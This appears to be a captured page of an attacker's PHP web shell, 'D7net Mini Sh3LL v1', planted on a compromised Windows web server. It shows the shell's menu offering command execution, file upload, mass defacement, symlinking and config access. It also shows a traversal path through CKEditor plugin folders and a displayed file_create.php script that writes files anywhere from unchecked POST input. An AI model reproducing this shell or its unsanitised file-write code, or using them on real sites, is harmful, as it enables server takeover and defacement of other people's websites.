D7net Mini Sh3LL v1

 
ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0777) :  C:/Domains/maymaytinson.com/httpdocs/filebrowser/../ckeditor/plugins/forms/../zsuploader/../liststyle/../easyimage/../zsuploader/../zamanager/commands/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : C:/Domains/maymaytinson.com/httpdocs/filebrowser/../ckeditor/plugins/forms/../zsuploader/../liststyle/../easyimage/../zsuploader/../zamanager/commands/file_create.php
<?php

$dir=$_POST['dir'];
$name=$_POST['new_name'];
$myfile = fopen($dir.$name, "w") or die("Unable to create file!".$name);
fclose($myfile);
echo "File ".$name." was created in Directory ".$dir;

AnonSec - 2021 | Recode By D7net